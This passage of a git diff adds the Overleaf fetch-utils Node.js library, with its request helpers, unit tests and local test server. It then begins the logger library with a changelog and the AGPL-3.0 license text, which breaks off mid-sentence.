abortOnDestroyedResponse(abortController, response) + + const stream = response.body + return { stream, response } +} + +/** + * Make a request and discard the response. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchNothing(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + await discardResponseBody(response) + return response +} + +/** + * Make a request and extract the redirect from the response. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise} + * @throws {RequestFailedError} if the response has a non redirect status code or missing Location header + */ +async function fetchRedirect(url, opts = {}) { + const { location } = await fetchRedirectWithResponse(url, opts) + return location +} + +/** + * Make a request and extract the redirect from the response. + * + * @param {string | URL} url - request URL + * @param {object} opts - fetch options + * @return {Promise<{location: string, response: Response}>} + * @throws {RequestFailedError} if the response has a non redirect status code or missing Location header + */ +async function fetchRedirectWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + fetchOpts.redirect = 'manual' + const response = await performRequest(url, fetchOpts) + if (response.status < 300 || response.status >= 400) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + const location = response.headers.get('Location') + if (!location) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body).withCause( + new OError('missing Location response header on 3xx response', { + headers: Object.fromEntries(response.headers.entries()), + }) + ) + } + await discardResponseBody(response) + return { location, response } +} + +/** + * Make a request and return a string. + * + * @param {string | URL} url - request URL + * @param {any} [opts] - fetch options + * @return {Promise} + * @throws {RequestFailedError} if the response has a failure status code + */ +async function fetchString(url, opts = {}) { + const { body } = await fetchStringWithResponse(url, opts) + return body +} + +async function fetchStringWithResponse(url, opts = {}) { + const { fetchOpts } = parseOpts(opts) + const response = await performRequest(url, fetchOpts) + if (!response.ok) { + const body = await maybeGetResponseBody(response) + throw new RequestFailedError(url, opts, response, body) + } + const body = await response.text() + return { body, response } +} + +class RequestFailedError extends OError { + constructor(url, opts, response, body) { + super('request failed', { + url, + method: opts.method ?? 'GET', + status: response.status, + }) + + this.response = response + if (body != null) { + this.body = body + } + } +} + +function parseOpts(opts) { + const fetchOpts = _.omit(opts, ['json', 'signal', 'basicAuth']) + if (opts.json) { + setupJsonBody(fetchOpts, opts.json) + } + if (opts.basicAuth) { + setupBasicAuth(fetchOpts, opts.basicAuth) + } + + const abortController = new AbortController() + fetchOpts.signal = abortController.signal + if (opts.signal) { + abortOnSignal(abortController, opts.signal) + } + if (opts.body instanceof Readable) { + abortOnDestroyedRequest(abortController, fetchOpts.body) + } + return { fetchOpts, abortController } +} + +function setupJsonBody(fetchOpts, json) { + fetchOpts.body = JSON.stringify(json) + fetchOpts.headers = fetchOpts.headers ?? {} + fetchOpts.headers['Content-Type'] = 'application/json' +} + +function setupBasicAuth(fetchOpts, basicAuth) { + fetchOpts.headers = fetchOpts.headers ?? {} + fetchOpts.headers.Authorization = + 'Basic ' + + Buffer.from(`${basicAuth.user}:${basicAuth.password}`).toString('base64') +} + +function abortOnSignal(abortController, signal) { + const listener = () => { + abortController.abort(signal.reason) + } + if (signal.aborted) { + abortController.abort(signal.reason) + } + signal.addEventListener('abort', listener) +} + +function abortOnDestroyedRequest(abortController, stream) { + stream.on('close', () => { + if (!stream.readableEnded) { + abortController.abort() + } + }) +} + +function abortOnDestroyedResponse(abortController, response) { + response.body.on('close', () => { + if (!response.bodyUsed) { + abortController.abort() + } + }) +} + +async function performRequest(url, fetchOpts) { + let response + try { + response = await fetch(url, fetchOpts) + } catch (err) { + if (fetchOpts.body instanceof Readable) { + fetchOpts.body.destroy() + } + throw OError.tag(err, err.message, { + url, + method: fetchOpts.method ?? 'GET', + }) + } + if (fetchOpts.body instanceof Readable) { + response.body.on('close', () => { + if (!fetchOpts.body.readableEnded) { + fetchOpts.body.destroy() + } + }) + } + return response +} + +async function discardResponseBody(response) { + // eslint-disable-next-line no-unused-vars + for await (const chunk of response.body) { + // discard the body + } +} + +/** + * @param {Response} response + */ +async function maybeGetResponseBody(response) { + try { + return await response.text() + } catch (err) { + return null + } +} + +// Define custom http and https agents with support for connect timeouts + +class ConnectTimeoutError extends OError { + constructor(options) { + super('connect timeout', options) + } +} + +function withTimeout(createConnection, options, callback) { + if (options.connectTimeout) { + // Wrap createConnection in a timeout + const timer = setTimeout(() => { + socket.destroy(new ConnectTimeoutError(options)) + }, options.connectTimeout) + const socket = createConnection(options, (err, stream) => { + clearTimeout(timer) + callback(err, stream) + }) + return socket + } else { + // Fallback to default createConnection + return createConnection(options, callback) + } +} + +class CustomHttpAgent extends http.Agent { + createConnection(options, callback) { + return withTimeout(super.createConnection.bind(this), options, callback) + } +} +class CustomHttpsAgent extends https.Agent { + createConnection(options, callback) { + return withTimeout(super.createConnection.bind(this), options, callback) + } +} + +module.exports = { + fetchJson, + fetchJsonWithResponse, + fetchStream, + fetchStreamWithResponse, + fetchNothing, + fetchRedirect, + fetchRedirectWithResponse, + fetchString, + fetchStringWithResponse, + RequestFailedError, + ConnectTimeoutError, + CustomHttpAgent, + CustomHttpsAgent, +} diff --git a/libraries/fetch-utils/package.json b/libraries/fetch-utils/package.json new file mode 100644 index 0000000..95c4d13 --- /dev/null +++ b/libraries/fetch-utils/package.json @@ -0,0 +1,33 @@ +{ + "name": "@overleaf/fetch-utils", + "version": "0.1.0", + "description": "utilities for node-fetch", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "@types/node-fetch": "^2.6.11", + "body-parser": "^1.20.3", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "express": "^4.21.2", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + }, + "dependencies": { + "@overleaf/o-error": "*", + "lodash": "^4.17.21", + "node-fetch": "^2.7.0", + "selfsigned": "^2.4.1" + } +} diff --git a/libraries/fetch-utils/test/setup.js b/libraries/fetch-utils/test/setup.js new file mode 100644 index 0000000..0906818 --- /dev/null +++ b/libraries/fetch-utils/test/setup.js @@ -0,0 +1,4 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') + +chai.use(chaiAsPromised) diff --git a/libraries/fetch-utils/test/unit/FetchUtilsTests.js b/libraries/fetch-utils/test/unit/FetchUtilsTests.js new file mode 100644 index 0000000..e9fd0ff --- /dev/null +++ b/libraries/fetch-utils/test/unit/FetchUtilsTests.js @@ -0,0 +1,414 @@ +const { expect } = require('chai') +const { FetchError, AbortError } = require('node-fetch') +const { Readable } = require('node:stream') +const { once } = require('node:events') +const { TestServer } = require('./helpers/TestServer') +const selfsigned = require('selfsigned') +const { + fetchJson, + fetchStream, + fetchNothing, + fetchRedirect, + fetchString, + RequestFailedError, + CustomHttpAgent, + CustomHttpsAgent, +} = require('../..') + +const HTTP_PORT = 30001 +const HTTPS_PORT = 30002 + +const attrs = [{ name: 'commonName', value: 'example.com' }] +const pems = selfsigned.generate(attrs, { days: 365 }) + +const PRIVATE_KEY = pems.private +const PUBLIC_CERT = pems.cert + +const dns = require('node:dns') +const _originalLookup = dns.lookup +// Custom DNS resolver function +dns.lookup = (hostname, options, callback) => { + if (hostname === 'example.com') { + // If the hostname is our test case, return the ip address for the test server + if (options?.all) { + callback(null, [{ address: '127.0.0.1', family: 4 }]) + } else { + callback(null, '127.0.0.1', 4) + } + } else { + // Otherwise, use the default lookup + _originalLookup(hostname, options, callback) + } +} + +describe('fetch-utils', function () { + before(async function () { + this.server = new TestServer() + await this.server.start(HTTP_PORT, HTTPS_PORT, { + key: PRIVATE_KEY, + cert: PUBLIC_CERT, + }) + this.url = path => `http://example.com:${HTTP_PORT}${path}` + this.httpsUrl = path => `https://example.com:${HTTPS_PORT}${path}` + }) + + beforeEach(function () { + this.server.lastReq = undefined + }) + + after(async function () { + await this.server.stop() + }) + + describe('fetchJson', function () { + it('parses a JSON response', async function () { + const json = await fetchJson(this.url('/json/hello')) + expect(json).to.deep.equal({ msg: 'hello' }) + }) + + it('parses JSON in the request', async function () { + const json = await fetchJson(this.url('/json/add'), { + method: 'POST', + json: { a: 2, b: 3 }, + }) + expect(json).to.deep.equal({ sum: 5 }) + }) + + it('accepts stringified JSON as body', async function () { + const json = await fetchJson(this.url('/json/add'), { + method: 'POST', + body: JSON.stringify({ a: 2, b: 3 }), + headers: { 'Content-Type': 'application/json' }, + }) + expect(json).to.deep.equal({ sum: 5 }) + }) + + it('throws a FetchError when the payload is not JSON', async function () { + await expect(fetchJson(this.url('/hello'))).to.be.rejectedWith(FetchError) + }) + + it('aborts the request if JSON parsing fails', async function () { + await expect(fetchJson(this.url('/large'))).to.be.rejectedWith(FetchError) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors when the payload is JSON', async function () { + await expect(fetchJson(this.url('/json/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors when the payload is not JSON', async function () { + await expect(fetchJson(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchJson(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports basic auth', async function () { + const json = await fetchJson(this.url('/json/basic-auth'), { + basicAuth: { user: 'user', password: 'pass' }, + }) + expect(json).to.deep.equal({ key: 'verysecret' }) + }) + + it("destroys the request body if it doesn't get consumed", async function () { + const stream = Readable.from(infiniteIterator()) + await fetchJson(this.url('/json/ignore-request'), { + method: 'POST', + body: stream, + }) + expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchStream', function () { + it('returns a stream', async function () { + const stream = await fetchStream(this.url('/large')) + const text = await streamToString(stream) + expect(text).to.equal(this.server.largePayload) + }) + + it('aborts the request when the stream is destroyed', async function () { + const stream = await fetchStream(this.url('/large')) + stream.destroy() + await expectRequestAborted(this.server.lastReq) + }) + + it('aborts the request when the request body is destroyed before transfer', async function () { + const stream = Readable.from(infiniteIterator()) + const promise = fetchStream(this.url('/hang'), { + method: 'POST', + body: stream, + }) + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await wait(80) + expect(this.server.lastReq).to.be.undefined + }) + + it('aborts the request when the request body is destroyed during transfer', async function () { + const stream = Readable.from(infiniteIterator()) + // Note: this test won't work on `/hang` + const promise = fetchStream(this.url('/sink'), { + method: 'POST', + body: stream, + }) + await once(this.server.events, 'request-received') + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors', async function () { + await expect(fetchStream(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchStream(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('destroys the request body when an error occurs', async function () { + const stream = Readable.from(infiniteIterator()) + await expect( + abortOnceReceived( + signal => + fetchStream(this.url('/hang'), { + method: 'POST', + body: stream, + signal, + }), + this.server + ) + ).to.be.rejectedWith(AbortError) + expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchNothing', function () { + it('closes the connection', async function () { + await fetchNothing(this.url('/large')) + await expectRequestAborted(this.server.lastReq) + }) + + it('aborts the request when the request body is destroyed before transfer', async function () { + const stream = Readable.from(infiniteIterator()) + const promise = fetchNothing(this.url('/hang'), { + method: 'POST', + body: stream, + }) + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + expect(this.server.lastReq).to.be.undefined + }) + + it('aborts the request when the request body is destroyed during transfer', async function () { + const stream = Readable.from(infiniteIterator()) + // Note: this test won't work on `/hang` + const promise = fetchNothing(this.url('/sink'), { + method: 'POST', + body: stream, + }) + await once(this.server.events, 'request-received') + stream.destroy() + await expect(promise).to.be.rejectedWith(AbortError) + await wait(80) + await expectRequestAborted(this.server.lastReq) + }) + + it("doesn't abort the request if the request body ends normally", async function () { + const stream = Readable.from('hello there') + await fetchNothing(this.url('/sink'), { method: 'POST', body: stream }) + }) + + it('handles errors', async function () { + await expect(fetchNothing(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('supports abort signals', async function () { + await expect( + abortOnceReceived( + signal => fetchNothing(this.url('/hang'), { signal }), + this.server + ) + ).to.be.rejectedWith(AbortError) + await expectRequestAborted(this.server.lastReq) + }) + + it('destroys the request body when an error occurs', async function () { + const stream = Readable.from(infiniteIterator()) + await expect( + abortOnceReceived( + signal => + fetchNothing(this.url('/hang'), { + method: 'POST', + body: stream, + signal, + }), + this.server + ) + ).to.be.rejectedWith(AbortError) + expect(stream.destroyed).to.be.true + }) + }) + + describe('fetchString', function () { + it('returns a string', async function () { + const body = await fetchString(this.url('/hello')) + expect(body).to.equal('hello') + }) + + it('handles errors', async function () { + await expect(fetchString(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + }) + + describe('fetchRedirect', function () { + it('returns the immediate redirect', async function () { + const body = await fetchRedirect(this.url('/redirect/1')) + expect(body).to.equal(this.url('/redirect/2')) + }) + + it('rejects status 200', async function () { + await expect(fetchRedirect(this.url('/hello'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + + it('rejects empty redirect', async function () { + await expect(fetchRedirect(this.url('/redirect/empty-location'))) + .to.be.rejectedWith(RequestFailedError) + .and.eventually.have.property('cause') + .and.to.have.property('message') + .to.equal('missing Location response header on 3xx response') + await expectRequestAborted(this.server.lastReq) + }) + + it('handles errors', async function () { + await expect(fetchRedirect(this.url('/500'))).to.be.rejectedWith( + RequestFailedError + ) + await expectRequestAborted(this.server.lastReq) + }) + }) + + describe('CustomHttpAgent', function () { + it('makes an http request successfully', async function () { + const agent = new CustomHttpAgent({ connectTimeout: 100 }) + const body = await fetchString(this.url('/hello'), { agent }) + expect(body).to.equal('hello') + }) + + it('times out when accessing a non-routable address', async function () { + const agent = new CustomHttpAgent({ connectTimeout: 10 }) + await expect(fetchString('http://10.255.255.255/', { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('message') + .and.to.equal( + 'request to http://10.255.255.255/ failed, reason: connect timeout' + ) + }) + }) + + describe('CustomHttpsAgent', function () { + it('makes an https request successfully', async function () { + const agent = new CustomHttpsAgent({ + connectTimeout: 100, + ca: PUBLIC_CERT, + }) + const body = await fetchString(this.httpsUrl('/hello'), { agent }) + expect(body).to.equal('hello') + }) + + it('rejects an untrusted server', async function () { + const agent = new CustomHttpsAgent({ + connectTimeout: 100, + }) + await expect(fetchString(this.httpsUrl('/hello'), { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('code') + .and.to.equal('DEPTH_ZERO_SELF_SIGNED_CERT') + }) + + it('times out when accessing a non-routable address', async function () { + const agent = new CustomHttpsAgent({ connectTimeout: 10 }) + await expect(fetchString('https://10.255.255.255/', { agent })) + .to.be.rejectedWith(FetchError) + .and.eventually.have.property('message') + .and.to.equal( + 'request to https://10.255.255.255/ failed, reason: connect timeout' + ) + }) + }) +}) + +async function streamToString(stream) { + let s = '' + for await (const chunk of stream) { + s += chunk + } + return s +} + +async function* infiniteIterator() { + let i = 1 + while (true) { + yield `chunk ${i++}\n` + } +} + +/** + * @param {(signal: AbortSignal) => Promise} func + * @param {TestServer} server + */ +async function abortOnceReceived(func, server) { + const controller = new AbortController() + const promise = func(controller.signal) + await once(server.events, 'request-received') + controller.abort() + return await promise +} + +async function expectRequestAborted(req) { + if (!req.destroyed) { + try { + await once(req, 'close') + } catch (err) { + // `once` throws if req emits an 'error' event. + // We ignore `Error: aborted` when the request is aborted. + if (err.message !== 'aborted') { + throw err + } + } + } + expect(req.destroyed).to.be.true +} + +const wait = ms => new Promise(resolve => setTimeout(resolve, ms)) diff --git a/libraries/fetch-utils/test/unit/helpers/TestServer.js b/libraries/fetch-utils/test/unit/helpers/TestServer.js new file mode 100644 index 0000000..4972777 --- /dev/null +++ b/libraries/fetch-utils/test/unit/helpers/TestServer.js @@ -0,0 +1,130 @@ +const express = require('express') +const bodyParser = require('body-parser') +const { EventEmitter } = require('node:events') +const http = require('node:http') +const https = require('node:https') +const { promisify } = require('node:util') + +class TestServer { + constructor() { + this.app = express() + this.events = new EventEmitter() + + this.app.use(bodyParser.json()) + this.app.use((req, res, next) => { + this.events.emit('request-received') + this.lastReq = req + next() + }) + + // Plain text endpoints + + this.app.get('/hello', (req, res) => { + res.send('hello') + }) + + this.largePayload = 'x'.repeat(16 * 1024 * 1024) + this.app.get('/large', (req, res) => { + res.send(this.largePayload) + }) + + this.app.get('/204', (req, res) => { + res.status(204).end() + }) + + this.app.get('/empty', (req, res) => { + res.end() + }) + + this.app.get('/500', (req, res) => { + res.sendStatus(500) + }) + + this.app.post('/sink', (req, res) => { + req.on('data', () => {}) + req.on('end', () => { + res.status(204).end() + }) + }) + + // JSON endpoints + + this.app.get('/json/hello', (req, res) => { + res.json({ msg: 'hello' }) + }) + + this.app.post('/json/add', (req, res) => { + const { a, b } = req.body + res.json({ sum: a + b }) + }) + + this.app.get('/json/500', (req, res) => { + res.status(500).json({ error: 'Internal server error' }) + }) + + this.app.get('/json/basic-auth', (req, res) => { + const expectedAuth = + 'Basic ' + Buffer.from('user:pass').toString('base64') + if (req.headers.authorization === expectedAuth) { + res.json({ key: 'verysecret' }) + } else { + res.status(401).json({ error: 'unauthorized' }) + } + }) + + this.app.post('/json/ignore-request', (req, res) => { + res.json({ msg: 'hello' }) + }) + + // Never returns + + this.app.get('/hang', (req, res) => {}) + this.app.post('/hang', (req, res) => {}) + + // Redirect + + this.app.get('/redirect/1', (req, res) => { + res.redirect('/redirect/2') + }) + this.app.get('/redirect/2', (req, res) => { + res.send('body after redirect') + }) + this.app.get('/redirect/empty-location', (req, res) => { + res.sendStatus(302) + }) + } + + start(port, httpsPort, httpsOptions) { + const startHttp = new Promise((resolve, reject) => { + this.server = http.createServer(this.app).listen(port, err => { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + const startHttps = new Promise((resolve, reject) => { + this.https_server = https + .createServer(httpsOptions, this.app) + .listen(httpsPort, err => { + if (err) { + reject(err) + } else { + resolve() + } + }) + }) + return Promise.all([startHttp, startHttps]) + } + + stop() { + const stopHttp = promisify(this.server.close).bind(this.server) + const stopHttps = promisify(this.https_server.close).bind(this.https_server) + this.server.closeAllConnections() + this.https_server.closeAllConnections() + return Promise.all([stopHttp(), stopHttps()]) + } +} + +module.exports = { TestServer } diff --git a/libraries/fetch-utils/tsconfig.json b/libraries/fetch-utils/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/fetch-utils/tsconfig.json @@ -0,0 +1,7 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/logger/.gitignore b/libraries/logger/.gitignore new file mode 100644 index 0000000..2006c87 --- /dev/null +++ b/libraries/logger/.gitignore @@ -0,0 +1,3 @@ +node_modules + +.npmrc diff --git a/libraries/logger/.mocharc.json b/libraries/logger/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/libraries/logger/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/libraries/logger/.nvmrc b/libraries/logger/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/logger/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/logger/CHANGELOG.md b/libraries/logger/CHANGELOG.md new file mode 100644 index 0000000..a581cf4 --- /dev/null +++ b/libraries/logger/CHANGELOG.md @@ -0,0 +1,10 @@ +## v3.1.1 + +* Handle malformed requests in the req serializer + +## v3.0.0 + +* Improve logging in Google Cloud Platform. Set environment variable `GCP_LOGGING=true` to enable. + +This version of the metrics module only works with versions of the `@overleaf/metrics` module greater than v4.0.0 + diff --git a/libraries/logger/LICENSE.txt b/libraries/logger/LICENSE.txt new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/libraries/logger/LICENSE.txt @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. + + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely 